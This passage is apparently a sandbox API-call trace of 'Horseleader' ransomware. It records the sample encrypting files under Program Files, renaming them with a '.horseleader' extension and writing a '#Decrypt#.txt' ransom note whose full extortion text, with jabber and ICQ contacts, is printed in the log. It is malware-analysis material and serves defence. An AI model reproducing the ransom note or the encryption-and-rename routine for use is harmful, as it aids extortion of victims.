dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.522] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.522] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0246.522] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.522] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.522] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.522] lstrlenW (lpString=".testttjffg") returned 11 [0246.522] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.522] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.522] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0246.523] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.523] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20575) returned 1 [0246.523] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.526] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.526] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.527] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5f, lpOverlapped=0x0) returned 1 [0246.527] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5f, lpOverlapped=0x0) returned 1 [0246.527] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.528] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.528] CloseHandle (hObject=0x1a4) returned 1 [0246.528] GetProcessHeap () returned 0x780000 [0246.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.528] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.horseleader") returned 92 [0246.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.horseleader")) returned 1 [0246.532] GetProcessHeap () returned 0x780000 [0246.533] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.533] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x505f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.533] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.533] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\#Decrypt#.txt") returned 81 [0246.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.534] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.534] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.535] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.535] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.535] CloseHandle (hObject=0x158) returned 1 [0246.535] GetProcessHeap () returned 0x780000 [0246.535] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.535] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CONCRETE", cAlternateFileName="")) returned 1 [0246.535] lstrcmpiW (lpString1="CONCRETE", lpString2="Windows") returned -1 [0246.535] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE") returned 68 [0246.535] lstrcmpW (lpString1="CONCRETE", lpString2=".") returned 1 [0246.535] lstrcmpW (lpString1="CONCRETE", lpString2="..") returned 1 [0246.535] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.535] GetProcessHeap () returned 0x780000 [0246.536] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.536] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*") returned 70 [0246.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.536] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.536] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\.") returned 70 [0246.536] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.536] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51cc30d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.536] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.536] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\..") returned 71 [0246.536] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.536] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.536] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ae7000, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2ae7000, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb1d8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CONCRETE.ELM", cAlternateFileName="")) returned 1 [0246.536] lstrcmpiW (lpString1="CONCRETE.ELM", lpString2="Windows") returned -1 [0246.537] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 81 [0246.537] StrStrIW (lpFirst="CONCRETE.ELM", lpSrch=".horseleader") returned 0x0 [0246.537] lstrcmpW (lpString1="CONCRETE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.537] lstrcmpW (lpString1="CONCRETE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.537] lstrlenW (lpString=".testttjffg") returned 11 [0246.537] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.537] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.537] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 81 [0246.539] StrStrW (lpFirst="CONCRETE.ELM", lpSrch=".txt") returned 0x0 [0246.539] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45528) returned 1 [0246.539] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.542] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.542] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.543] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.543] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.543] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.544] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x11d8, lpOverlapped=0x0) returned 1 [0246.544] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffee28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x11d8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x11d8, lpOverlapped=0x0) returned 1 [0246.544] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.544] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.544] CloseHandle (hObject=0x1a4) returned 1 [0246.545] GetProcessHeap () returned 0x780000 [0246.545] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.545] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM.horseleader") returned 93 [0246.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm.horseleader")) returned 1 [0246.546] GetProcessHeap () returned 0x780000 [0246.546] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.546] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x60440c50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CONCRETE.INF", cAlternateFileName="")) returned 1 [0246.546] lstrcmpiW (lpString1="CONCRETE.INF", lpString2="Windows") returned -1 [0246.546] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF") returned 81 [0246.546] StrStrIW (lpFirst="CONCRETE.INF", lpSrch=".horseleader") returned 0x0 [0246.546] lstrcmpW (lpString1="CONCRETE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.546] lstrcmpW (lpString1="CONCRETE.INF", lpString2="_uninstalling_.png") returned 1 [0246.546] lstrlenW (lpString=".testttjffg") returned 11 [0246.546] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF", lpSrch=".testttjffg") returned 0x0 [0246.546] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.546] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.546] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF") returned 81 [0246.547] StrStrW (lpFirst="CONCRETE.INF", lpSrch=".txt") returned 0x0 [0246.547] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=480) returned 1 [0246.547] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e0, lpOverlapped=0x0) returned 1 [0246.548] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e0, lpOverlapped=0x0) returned 1 [0246.549] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.549] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.549] CloseHandle (hObject=0x1a4) returned 1 [0246.549] GetProcessHeap () returned 0x780000 [0246.549] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.549] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF.horseleader") returned 93 [0246.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.inf.horseleader")) returned 1 [0246.553] GetProcessHeap () returned 0x780000 [0246.553] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.553] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x507, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.553] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.553] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 80 [0246.553] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.553] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.553] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.553] lstrlenW (lpString=".testttjffg") 